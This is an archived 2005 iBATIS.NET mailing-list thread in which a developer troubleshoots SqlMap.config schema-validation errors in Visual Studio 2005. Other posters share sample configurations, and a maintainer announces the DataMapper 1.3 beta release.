and/or legally privileged. It is intended solely for the use of the individual or entity named on this message. If you are not the intended recipient, and have received this message in error, please notify us immediately by reply e-mail and then delete it from your system. ------------------------------------------------------------------------------ From [email protected] Wed Dec 14 20:26:26 2005 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 27716 invoked from network); 14 Dec 2005 20:26:26 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 14 Dec 2005 20:26:26 -0000 Received: (qmail 50604 invoked by uid 500); 14 Dec 2005 20:26:25 -0000 Delivered-To: [email protected] Received: (qmail 50585 invoked by uid 500); 14 Dec 2005 20:26:25 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <user-cs.ibatis.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 50567 invoked by uid 99); 14 Dec 2005 20:26:25 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 14 Dec 2005 12:26:25 -0800 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received-SPF: pass (asf.osuosl.org: local policy) Received: from [161.129.204.104] (HELO usryim05.merck.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 14 Dec 2005 12:26:24 -0800 Received: from 161.129.204.104 by usryim05.merck.com with ESMTP (SMTP Relay); Wed, 14 Dec 2005 15:25:56 -0500 X-Server-Uuid: A6D88DB6-305E-4C65-A4F6-648158ED4776 Received: from 161.129.204.104 by usrytw31.merck.com with ESMTP (Tumbleweed Email Firewall SMTP Relay (Email Firewall v6.1.1)); Wed, 14 Dec 2005 15:25:44 -0500 X-Server-Uuid: E1D334D3-E18D-4307-83C1-2B84D3407A0B Received: by usrygw32.merck.com with Internet Mail Service (5.5.2658.27) id <V7DAM985>; Wed, 14 Dec 2005 15:25:44 -0500 Message-ID: <[email protected]> From: "Hoffman, Ira" <[email protected]> To: "'[email protected]'" <[email protected]>, "'Ron Grabowski'" <[email protected]> Subject: RE: iBatis and Visual Studio 2005 Woes Date: Wed, 14 Dec 2005 15:25:32 -0500 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.5.2658.27) X-WSS-ID: 6FBEA04223O29315163-02-01 X-WSS-ID: 6FBEA0352TS11208970-05-01 Content-Type: text/plain Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N That made Visual Studio 2005 feel better, but I am still getting a fairly lengthy error: IBatisNet.Common.Exceptions.ConfigurationException: - The error occurred while Validate SqlMap config. - The error occurred in The 'http://ibatis.apache.org/dataMapper:sqlMapConfig' element is not declared. The 'http://ibatis.apache.org/dataMapper:properties' element is not declared. Could not find schema information for the attribute 'file'. The 'http://ibatis.apache.org/dataMapper:settings' element is not declared. The 'http://ibatis.apache.org/dataMapper:setting' element is not declared. Could not find schema information for the attribute 'useFullyQualifiedStatementNames'. The 'http://ibatis.apache.org/dataMapper:setting' element is not declared. Could not find schema information for the attribute 'cacheModelsEnabled'. The 'http://ibatis.apache.org/dataMapper:database' element is not declared. The 'http://ibatis.apache.org/dataMapper:provider' element is not declared. Could not find schema information for the attribute 'name'. The 'http://ibatis.apache.org/dataMapper:dataSource' element is not declared. Could not find schema information for the attribute 'name'. Could not find schema information for the attribute 'connectionString'. The 'http://ibatis.apache.org/dataMapper:sqlMaps' element is not declared. The 'http://ibatis.apache.org/dataMapper:sqlMap' element is not declared. Could not find schema information for the attribute 'file'. . ---> IBatisNet.Common.Exceptions.ConfigurationException: Invalid SqlMap.config document. cause :The 'http://ibatis.apache.org/dataMapper:sqlMapConfig' element is not declared. The 'http://ibatis.apache.org/dataMapper:properties' element is not declared. Could not find schema information for the attribute 'file'. The 'http://ibatis.apache.org/dataMapper:settings' element is not declared. The 'http://ibatis.apache.org/dataMapper:setting' element is not declared. Could not find schema information for the attribute 'useFullyQualifiedStatementNames'. The 'http://ibatis.apache.org/dataMapper:setting' element is not declared. Could not find schema information for the attribute 'cacheModelsEnabled'. The 'http://ibatis.apache.org/dataMapper:database' element is not declared. The 'http://ibatis.apache.org/dataMapper:provider' element is not declared. Could not find schema information for the attribute 'name'. The 'http://ibatis.apache.org/dataMapper:dataSource' element is not declared. Could not find schema information for the attribute 'name'. Could not find schema information for the attribute 'connectionString'. The 'http://ibatis.apache.org/dataMapper:sqlMaps' element is not declared. The 'http://ibatis.apache.org/dataMapper:sqlMap' element is not declared. Could not find schema information for the attribute 'file'. at IBatisNet.DataMapper.Configuration.DomSqlMapBuilder.ValidateSchema(XmlNode section, String schemaFileName) at IBatisNet.DataMapper.Configuration.DomSqlMapBuilder.Build(XmlDocument document, DataSource dataSource, Boolean useConfigFileWatcher, Boolean isCallFromDao) --- End of inner exception stack trace --- at IBatisNet.DataMapper.Configuration.DomSqlMapBuilder.Build(XmlDocument document, DataSource dataSource, Boolean useConfigFileWatcher, Boolean isCallFromDao) at IBatisNet.DataMapper.Configuration.DomSqlMapBuilder.ConfigureAndWatch(String resource, ConfigureHandler configureDelegate) at IBatisNet.DataMapper.Configuration.DomSqlMapBuilder.ConfigureAndWatch(Config ureHandler configureDelegate) at MerckSAS.Library.Services.Mapper.InitMapper() in c:\Inetpub\wwwroot\MerckSAS\App_Code\Mapper.cs:line 25 at MerckSAS.Library.Services.Mapper.Instance() in c:\Inetpub\wwwroot\MerckSAS\App_Code\Mapper.cs:line 36 at MerckSAS.Library.Services.Mapper.Get() in c:\Inetpub\wwwroot\MerckSAS\App_Code\Mapper.cs:line 45 at MerckSasService..ctor() in c:\Inetpub\wwwroot\MerckSAS\App_Code\MerckSasService.cs:line 23 I went to the URL for the dataMapper and the document was not found. Could this be a problem? Thanks, Ira -----Original Message----- From: Ron Grabowski [mailto:[email protected]] Sent: Wednesday, December 14, 2005 11:39 AM To: [email protected] Subject: Re: iBatis and Visual Studio 2005 Woes The top of your SqlMap.config file should look something like this: <?xml version="1.0" encoding="UTF-8" ?> xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" > The top of your sqlMap files should look like this: <?xml version="1.0" encoding="UTF-8" ?> <sqlMap namespace="Customer" xmlns="http://ibatis.apache.org/mapping" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"> ----- Original Message ---- From: "Hoffman, Ira" <[email protected]> To: "[email protected]" <[email protected]> Sent: Wednesday, December 14, 2005 6:25:25 AM Subject: iBatis and Visual Studio 2005 Woes All, I am trying to develop a .NET 2.0 middle-tier that leverages iBatis. I have used iBatis before, in the Java world, and greatly enjoyed it. However, I am having problems getting the most basic configuration working with Visual Studio 2005 and iBatis. I have created a new ASP .NET Web Service Project and am unable to read the sqlMap.config properties file. Here is the error message: IBatisNet.Common.Exceptions.ConfigurationException: - The error occurred while Validate SqlMap config. - The error occurred in The 'file' attribute is not declared. The 'useFullyQualifiedStatementNames' attribute is not declared. The 'file' attribute is not declared. . ---> IBatisNet.Common.Exceptions.ConfigurationException: Invalid SqlMap.config document. cause :The 'file' attribute is not declared. The 'useFullyQualifiedStatementNames' attribute is not declared. The 'file' attribute is not declared. at IBatisNet.DataMapper.Configuration.DomSqlMapBuilder.ValidateSchema(XmlNode section, String schemaFileName) at IBatisNet.DataMapper.Configuration.DomSqlMapBuilder.Build(XmlDocument document, DataSource dataSource, Boolean useConfigFileWatcher, Boolean isCallFromDao) --- End of inner exception stack trace --- at IBatisNet.DataMapper.Configuration.DomSqlMapBuilder.Build(XmlDocument document, DataSource dataSource, Boolean useConfigFileWatcher, Boolean isCallFromDao) at IBatisNet.DataMapper.Configuration.DomSqlMapBuilder.ConfigureAndWatch(String resource, ConfigureHandler configureDelegate) at IBatisNet.DataMapper.Configuration.DomSqlMapBuilder.ConfigureAndWatch(Config ureHandler configureDelegate) at MerckSAS.Library.Services.Mapper.InitMapper() in c:\Inetpub\wwwroot\MerckSAS\App_Code\Mapper.cs:line 25 at MerckSAS.Library.Services.Mapper.Instance() in c:\Inetpub\wwwroot\MerckSAS\App_Code\Mapper.cs:line 36 at MerckSAS.Library.Services.Mapper.Get() in c:\Inetpub\wwwroot\MerckSAS\App_Code\Mapper.cs:line 45 at MerckSasService..ctor() in c:\Inetpub\wwwroot\MerckSAS\App_Code\MerckSasService.cs:line 23 Here is my sqlMap.config file: <?xml version="1.0" encoding="utf-8" ?> <sqlMapConfig xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"; xsi:noNamespaceSchemaLocation="SqlMapConfig.xsd"> <properties file="database.properties" /> <settings> <setting useFullyQualifiedStatementNames="false" /> <setting cacheModelsEnabled="true" /> </settings> <database> <provider name="oracle9.2" /> <dataSource name="REMP" connectionString="user id=${username};password=${password};data source=${datasource};connection reset=false;connection lifetime=5;min pool size=1;max pool size=50" /> </database> <sqlMaps> <sqlMap file="Maps/SqlMap.xml" /> </sqlMaps> </sqlMapConfig> Here is my SqlMap.xml file: <?xml version='1.0'?> <sqlMap namespace="Remp" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"; xsi:noNamespaceSchemaLocation="..\SqlMap.xsd"> <resultMaps> <resultMap id="getSubstanceLibraryMap" class="subtanceLibrary"> <result property="projectId" column="project_id"/> <result property="projectName" column="project_name"/> <result property="projectShortName" column="project_short_name"/> <result property="dlcAssayId" column="dlc_assay_id"/> <result property="sourceProjectPlateLayoutId" column="source_plate_layout_id"/> <result property="destinationProjectPlateLayoutId" column="destination_plate_layout_id"/> <result property="dlcProtocolVersion" column="dlc_protocol_version"/> </resultMap> <resultMap id="getCompoundMap" class="compound"> <result property="CompoundId" column="CPD_ID"/> <result property="Name" column="NAME"/> <result property="AlternateName" column="ALTERNATENAME"/> <result property="MolecularWeight" column="MOLWEIGHT"/> <result property="MutDateTime" column="MUT_DATETIME"/> </resultMap> </resultMaps> <statements> <select id="selectSubstanceLibrary" resultMap="getSubstanceLibraryMap"> select * from subst_library </select> <select id="selectCompound" resultMap="getCompoundMap"> select * from compound </select> </statements> </sqlMap> I wasn't too sure about the directory location of the SqlMap.config file...any ideas abou this error? Thanks, Ira ---------------------------------------------------------------------------- -- Notice: This e-mail message, together with any attachments, contains information of Merck & Co., Inc. (One Merck Drive, Whitehouse Station, New Jersey, USA 08889), and/or its affiliates (which may be known outside the United States as Merck Frosst, Merck Sharp & Dohme or MSD and in Japan, as Banyu) that may be confidential, proprietary copyrighted and/or legally privileged. It is intended solely for the use of the individual or entity named on this message. If you are not the intended recipient, and have received this message in error, please notify us immediately by reply e-mail and then delete it from your system. ---------------------------------------------------------------------------- -- ------------------------------------------------------------------------------ Notice: This e-mail message, together with any attachments, contains information of Merck & Co., Inc. (One Merck Drive, Whitehouse Station, New Jersey, USA 08889), and/or its affiliates (which may be known outside the United States as Merck Frosst, Merck Sharp & Dohme or MSD and in Japan, as Banyu) that may be confidential, proprietary copyrighted and/or legally privileged. It is intended solely for the use of the individual or entity named on this message. If you are not the intended recipient, and have received this message in error, please notify us immediately by reply e-mail and then delete it from your system. ------------------------------------------------------------------------------ From [email protected] Thu Dec 15 12:49:27 2005 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 53621 invoked from network); 15 Dec 2005 12:48:55 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 15 Dec 2005 12:48:55 -0000 Received: (qmail 63731 invoked by uid 500); 15 Dec 2005 12:48:39 -0000 Delivered-To: [email protected] Received: (qmail 63717 invoked by uid 500); 15 Dec 2005 12:48:39 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <user-cs.ibatis.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 63706 invoked by uid 99); 15 Dec 2005 12:48:38 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 15 Dec 2005 04:48:38 -0800 X-ASF-Spam-Status: No, hits=0.5 required=10.0 tests=DNS_FROM_RFC_ABUSE X-Spam-Check-By: apache.org Received-SPF: pass (asf.osuosl.org: local policy includes SPF [email protected]) Received: from [161.129.204.104] (HELO web25605.mail.ukl.yahoo.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with SMTP; Thu, 15 Dec 2005 04:48:38 -0800 Received: (qmail 10041 invoked by uid 60001); 15 Dec 2005 12:48:15 -0000 DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws; s=s1024; d=yahoo.es; h=Message-ID:Received:Date:From:Subject:To:In-Reply-To:MIME-Version:Content-Type:Content-Transfer-Encoding; b=1qv9v6h82dmOivqGqHADQ3AMdny3x2bCKQgxLXIZRy25hnBWHxxqFNE5RgOLcdeZI6hahjuhHXqfwbv9rjIys+lN6rDfdlqY+He8SZV+AlHOcvfyAVR0jjMfByIsOrd99GXsDAhuThs7epIScCPaYgbkyb7N59SgtMyGv+GMETA= ; Message-ID: <[email protected]> Received: from [161.129.204.104] by web25605.mail.ukl.yahoo.com via HTTP; Thu, 15 Dec 2005 13:48:14 CET Date: Thu, 15 Dec 2005 13:48:14 +0100 (CET) From: Mariano <[email protected]> Subject: RE: iBatis and Visual Studio 2005 Woes To: [email protected], 'Ron Grabowski' <[email protected]> In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: text/plain; charset=iso-8859-1 Content-Transfer-Encoding: 8bit X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N Hi Im not sure , but I had the next problems: properties.config <provider name="oracle9.2" enabled="true" //Activated assemblyName="Oracle.DataAccess, Version=161.129.204.1041, Culture=neutral, PublicKeyToken=89b483f429c47342" connectionClass="Oracle.DataAccess.Client.OracleConnection" commandClass="Oracle.DataAccess.Client.OracleCommand" parameterClass="Oracle.DataAccess.Client.OracleParameter" parameterDbTypeClass="System.Data.Client.OracleDbType" parameterDbTypeProperty="OracleDbType" dataAdapterClass="Oracle.DataAccess.Client.OracleDataAdapter" commandBuilderClass="Oracle.DataAccess.Client.OracleCommandBuilder" usePositionalParameters = "false" useParameterPrefixInSql = "true" useParameterPrefixInParameter = "false" parameterPrefix=":" /> My file of sqlmap.config <?xml version="1.0" encoding="UTF-8" ?> <sqlMapConfig xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="SqlMapConfig.xsd">   <properties resource="C:\properties.config"/>   <providers resource="C:\providers.config"/> <database> <provider name="oracle9.2"/> <dataSource name="Arquitectura" connectionString="${connectionString}"/> </database> <sqlMaps> <sqlMap resource="C:\CONFIGURACION.xml"/> </sqlMaps> </sqlMapConfig> <!--CONFIGURACION.xml-----> <?xml version="1.0" encoding="utf-8" ?> <sqlMap namespace="Configuracion" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="SqlMap.xsd"> <alias> <typeAlias alias="configuracion" type="Ma.Informacion.Configuracion, Ma.Informacion" /> </alias> <!-- XML "behind" document for the People service class. --> <statements> <!-- PROCEDMIENTO SELECT --> <select id="CONFIGURACION" resultClass="configuracion"> SELECT * from configuracion </select> </statements> </sqlMap> Tnks --- "Hoffman, Ira" <[email protected]> escribió: > That made Visual Studio 2005 feel better, but I am > still getting a fairly > lengthy error: > > IBatisNet.Common.Exceptions.ConfigurationException: > - The error occurred while Validate SqlMap config. > - The error occurred in The > 'http://ibatis.apache.org/dataMapper:sqlMapConfig' > element is not declared. > The 'http://ibatis.apache.org/dataMapper:properties' > element is not > declared. > Could not find schema information for the attribute > 'file'. > The 'http://ibatis.apache.org/dataMapper:settings' > element is not declared. > The 'http://ibatis.apache.org/dataMapper:setting' > element is not declared. > Could not find schema information for the attribute > 'useFullyQualifiedStatementNames'. > The 'http://ibatis.apache.org/dataMapper:setting' > element is not declared. > Could not find schema information for the attribute > 'cacheModelsEnabled'. > The 'http://ibatis.apache.org/dataMapper:database' > element is not declared. > The 'http://ibatis.apache.org/dataMapper:provider' > element is not declared. > Could not find schema information for the attribute > 'name'. > The 'http://ibatis.apache.org/dataMapper:dataSource' > element is not > declared. > Could not find schema information for the attribute > 'name'. > Could not find schema information for the attribute > 'connectionString'. > The 'http://ibatis.apache.org/dataMapper:sqlMaps' > element is not declared. > The 'http://ibatis.apache.org/dataMapper:sqlMap' > element is not declared. > Could not find schema information for the attribute > 'file'. > . ---> > IBatisNet.Common.Exceptions.ConfigurationException: > Invalid > SqlMap.config document. cause :The > 'http://ibatis.apache.org/dataMapper:sqlMapConfig' > element is not declared. > The 'http://ibatis.apache.org/dataMapper:properties' > element is not > declared. > Could not find schema information for the attribute > 'file'. > The 'http://ibatis.apache.org/dataMapper:settings' > element is not declared. > The 'http://ibatis.apache.org/dataMapper:setting' > element is not declared. > Could not find schema information for the attribute > 'useFullyQualifiedStatementNames'. > The 'http://ibatis.apache.org/dataMapper:setting' > element is not declared. > Could not find schema information for the attribute > 'cacheModelsEnabled'. > The 'http://ibatis.apache.org/dataMapper:database' > element is not declared. > The 'http://ibatis.apache.org/dataMapper:provider' > element is not declared. > Could not find schema information for the attribute > 'name'. > The 'http://ibatis.apache.org/dataMapper:dataSource' > element is not > declared. > Could not find schema information for the attribute > 'name'. > Could not find schema information for the attribute > 'connectionString'. > The 'http://ibatis.apache.org/dataMapper:sqlMaps' > element is not declared. > The 'http://ibatis.apache.org/dataMapper:sqlMap' > element is not declared. > Could not find schema information for the attribute > 'file'. > > at > IBatisNet.DataMapper.Configuration.DomSqlMapBuilder.ValidateSchema(XmlNode > section, String schemaFileName) > at > IBatisNet.DataMapper.Configuration.DomSqlMapBuilder.Build(XmlDocument > document, DataSource dataSource, Boolean > useConfigFileWatcher, Boolean > isCallFromDao) > --- End of inner exception stack trace --- > at > IBatisNet.DataMapper.Configuration.DomSqlMapBuilder.Build(XmlDocument > document, DataSource dataSource, Boolean > useConfigFileWatcher, Boolean > isCallFromDao) > at > IBatisNet.DataMapper.Configuration.DomSqlMapBuilder.ConfigureAndWatch(String > resource, ConfigureHandler configureDelegate) > at > IBatisNet.DataMapper.Configuration.DomSqlMapBuilder.ConfigureAndWatch(Config > ureHandler configureDelegate) > at MerckSAS.Library.Services.Mapper.InitMapper() > in > c:\Inetpub\wwwroot\MerckSAS\App_Code\Mapper.cs:line > 25 > at MerckSAS.Library.Services.Mapper.Instance() in > c:\Inetpub\wwwroot\MerckSAS\App_Code\Mapper.cs:line > 36 > at MerckSAS.Library.Services.Mapper.Get() in > c:\Inetpub\wwwroot\MerckSAS\App_Code\Mapper.cs:line > 45 > at MerckSasService..ctor() in > c:\Inetpub\wwwroot\MerckSAS\App_Code\MerckSasService.cs:line > 23 > > I went to the URL for the dataMapper and the > document was not found. Could > this be a problem? > > Thanks, > Ira > > > -----Original Message----- > From: Ron Grabowski [mailto:[email protected]] > Sent: Wednesday, December 14, 2005 11:39 AM > To: [email protected] > Subject: Re: iBatis and Visual Studio 2005 Woes > > > The top of your SqlMap.config file should look > something like this: > > <?xml version="1.0" encoding="UTF-8" ?> > > xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" > > > > The top of your sqlMap files should look like this: > > <?xml version="1.0" encoding="UTF-8" ?> > <sqlMap namespace="Customer" > xmlns="http://ibatis.apache.org/mapping" > xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"> > > ----- Original Message ---- > From: "Hoffman, Ira" <[email protected]> > To: "[email protected]" > <[email protected]> > Sent: Wednesday, December 14, 2005 6:25:25 AM > Subject: iBatis and Visual Studio 2005 Woes > > All, > > I am trying to develop a .NET 2.0 middle-tier that > leverages iBatis. I have > used iBatis before, in the Java world, and greatly > enjoyed it. However, I am > having problems getting the most basic configuration > working with Visual > Studio 2005 and iBatis. I have created a new ASP > .NET Web Service Project > and am unable to read the sqlMap.config properties > file. Here is the error > message: > > IBatisNet.Common.Exceptions.ConfigurationException: > - The error occurred while Validate SqlMap config. > - The error occurred in The 'file' attribute is not > declared. > The 'useFullyQualifiedStatementNames' attribute is > not declared. > The 'file' attribute is not declared. > . ---> > IBatisNet.Common.Exceptions.ConfigurationException: > Invalid > SqlMap.config document. cause :The 'file' attribute > is not declared. > The 'useFullyQualifiedStatementNames' attribute is > not declared. > The 'file' attribute is not declared. > > at > IBatisNet.DataMapper.Configuration.DomSqlMapBuilder.ValidateSchema(XmlNode > section, String schemaFileName) > at > IBatisNet.DataMapper.Configuration.DomSqlMapBuilder.Build(XmlDocument > document, DataSource dataSource, Boolean > useConfigFileWatcher, Boolean > isCallFromDao) > --- End of inner exception stack trace --- > at > IBatisNet.DataMapper.Configuration.DomSqlMapBuilder.Build(XmlDocument > document, DataSource dataSource, Boolean > useConfigFileWatcher, Boolean > isCallFromDao) > at > IBatisNet.DataMapper.Configuration.DomSqlMapBuilder.ConfigureAndWatch(String > === message truncated === ______________________________________________ Renovamos el Correo Yahoo! Nuevos servicios, más seguridad http://correo.yahoo.es From [email protected] Thu Dec 15 18:40:19 2005 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 42148 invoked from network); 15 Dec 2005 18:40:19 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 15 Dec 2005 18:40:19 -0000 Received: (qmail 88153 invoked by uid 500); 15 Dec 2005 18:40:18 -0000 Delivered-To: [email protected] Received: (qmail 87617 invoked by uid 500); 15 Dec 2005 18:40:15 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <user-cs.ibatis.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 87594 invoked by uid 500); 15 Dec 2005 18:40:15 -0000 Delivered-To: [email protected] Received: (qmail 87588 invoked by uid 99); 15 Dec 2005 18:40:15 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 15 Dec 2005 10:40:15 -0800 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests=HTML_MESSAGE,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (asf.osuosl.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO nproxy.gmail.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 15 Dec 2005 10:40:14 -0800 Received: by nproxy.gmail.com with SMTP id a25so151729nfc for <[email protected]>; Thu, 15 Dec 2005 10:39:53 -0800 (PST) DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws; s=beta; d=gmail.com; h=received:message-id:date:from:to:subject:mime-version:content-type; b=T9nLmT7MwbVoKAf/naVu5DUYnb5M1tUMNC0AcKeXzKt9Wl3fr6+RXhIbjgFXdLeAbmzNWOUm0Klt0n3/ytlj7gZX2oH4+vqCo5jKoC4jhi2zs48ZZE5Wa47AKgaLQ7IShyG+ZUqcGMBOcKeNI8jMlc8W9PFx429sW7llc4YIS+w= Received: by 161.129.204.104 with SMTP id v11mr105580nfg; Thu, 15 Dec 2005 10:39:52 -0800 (PST) Received: by 161.129.204.104 with HTTP; Thu, 15 Dec 2005 10:39:52 -0800 (PST) Message-ID: <[email protected]> Date: Thu, 15 Dec 2005 19:39:52 +0100 From: Gilles Bayon <[email protected]> To: [email protected], [email protected], [email protected] Subject: [ANNOUNCE] iBATIS.NET DataMapper & DataAccess Release MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_Part_16669_32798079.1134671992828" X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N ------=_Part_16669_32798079.1134671992828 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: quoted-printable Content-Disposition: inline The iBATIS.NET team is pleased to announce that the BETA releases of the DataMapper V1.3 and DataAccess V1.7 frameworks are ready ! This release is primarily a bug fix and documentation enhancement release. Some minor new features were added. Important bug fixes and new features are: - Allow Intellisense in Visual Studio 2003 for configuration and mapping files - Updated schemas - Updated to Castle.DynamicProxy V161.129.204.104 - Add signing on assembly - Added custom logger support - Removes use of Xml serialization for loading configuration file Thanks once again for your comments and suggestions. Enjoy! See the change log for more details. Downloads will be available from http://ibatis.apache.org/downloads.html, i= f you can't wait go to http://cvs.apache.org/dist/ibatis/ibatis.net/beta/. Cheers, Gilles ------=_Part_16669_32798079.1134671992828 Content-Type: text/html; charset=ISO-8859-1 Content-Transfer-Encoding: quoted-printable Content-Disposition: inline <p>&nbsp;The <a href=3D"http://iBATIS.NET">iBATIS.NET</a> team is pleased t= o announce that the BETA releases of the DataMapper V1.3&nbsp;and DataAcces= s V1.7 frameworks are ready !</p> <p>This release is primarily a bug fix and documentation enhancement releas= e. Some minor new features were added. </p> <p>Important bug fixes and new features are: </p> <p>- Allow Intellisense in Visual Studio 2003 for configuration and mapping= &nbsp;files <br>- Updated schemas<br>- Updated to Castle.DynamicProxy V1.1.= 5.0<br>- Add signing on assembly <br>- Added custom logger support<br>- Rem= oves use of Xml serialization for loading configuration file </p> <p>Thanks once again for your comments and suggestions. Enjoy! </p> <p>See the change log for more details. </p> <div>Downloads will be available from <a href=3D"http://ibatis.apache.org/d= ownloads.html">http://ibatis.apache.org/downloads.html</a>, if you can't wa= it go to&nbsp; <a href=3D"http://cvs.apache.org/dist/ibatis/ibatis.net/beta= /">http://cvs.apache.org/dist/ibatis/ibatis.net/beta/ </a>.</div> <div>&nbsp;</div> <div>Cheers,</div> <div>Gilles</div> ------=_Part_16669_32798079.1134671992828-- From [email protected] Fri Dec 16 19:35:35 2005 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 81568 invoked from network); 16 Dec 2005 19:35:35 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 16 Dec 2005 19:35:35 -0000 Received: (qmail 15285 invoked by uid 500); 16 Dec 2005 19:35:33 -0000 Delivered-To: [email protected] Received: (qmail 15192 invoked by uid 500); 16 Dec 2005 19:35:33 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <user-cs.ibatis.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 15143 invoked by uid 99); 16 Dec 2005 19:35:32 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 16 Dec 2005 11:35:32 -0800 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received-SPF: pass (asf.osuosl.org: local policy) Received: from [161.129.204.104] (HELO usryim05.merck.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 16 Dec 2005 11:35:31 -0800 Received: from 161.129.204.104 by usryim05.merck.com with ESMTP (SMTP Relay); Fri, 16 Dec 2005 14:34:57 -0500 X-Server-Uuid: A6D88DB6-305E-4C65-A4F6-648158ED4776 Received: from 161.129.204.104 by usrytw30.merck.com with ESMTP (Tumbleweed Email Firewall SMTP Relay (Email Firewall v6.1.1)); Fri, 16 Dec 2005 14:34:45 -0500 X-Server-Uuid: 5A1583D2-9438-462B-8CA0-21F9DF195542 Received: by usrygw32.merck.com with Internet Mail Service (5.5.2658.27) id <V7DA8A6Z>; Fri, 16 Dec 2005 14:34:45 -0500 Message-ID: <[email protected]> From: "Hoffman, Ira" <[email protected]> To: "'[email protected]'" <[email protected]>, "'Ron Grabowski'" <[email protected]>, "'Mariano'" <[email protected]> Subject: RE: iBatis and Visual Studio 2005 Woes Date: Fri, 16 Dec 2005 14:34:44 -0500 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.5.2658.27) X-WSS-ID: 6FBDC95F33O3755071-01-01 X-WSS-ID: 6FBDC94D2TS11841339-09-01 Content-Type: text/plain; charset=iso-8859-1 Content-Transfer-Encoding: quoted-printable X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N I upgraded to the latest release of the data mapper and most of my problems went away. Let me know if you have any questions. -Ira. -----Original Message----- =46rom: Mariano [mailto:[email protected]]=20 Sent: Thursday, December 15, 2005 7:48 AM To: [email protected]; 'Ron Grabowski' Subject: RE: iBatis and Visual Studio 2005 Woes Hi=20 Im not sure , but I had the next problems: properties.config <provider name=3D"oracle9.2" enabled=3D"true" //Activated assemblyName=3D"Oracle.DataAccess, Version=3D161.129.204.1041, Culture=3Dneutral, PublicKeyToken=3D89b483f429c47342" =09 connectionClass=3D"Oracle.DataAccess.Client.OracleConnection" =09 commandClass=3D"Oracle.DataAccess.Client.OracleCommand" =09 parameterClass=3D"Oracle.DataAccess.Client.OracleParameter" =09 parameterDbTypeClass=3D"System.Data.Client.OracleDbType" parameterDbTypeProperty=3D"OracleDbType" =09 dataAdapterClass=3D"Oracle.DataAccess.Client.OracleDataAdapter" =09 commandBuilderClass=3D"Oracle.DataAccess.Client.OracleCommandBuilder" usePositionalParameters =3D "false" useParameterPrefixInSql =3D "true" useParameterPrefixInParameter =3D "false" parameterPrefix=3D":"=20 /> My file of sqlmap.config <=3Fxml version=3D"1.0" encoding=3D"UTF-8" =3F> <sqlMapConfig xmlns:xsi=3D"http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation=3D"SqlMapConfig.xsd"> =A0 <properties resource=3D"C:\properties.config"/> 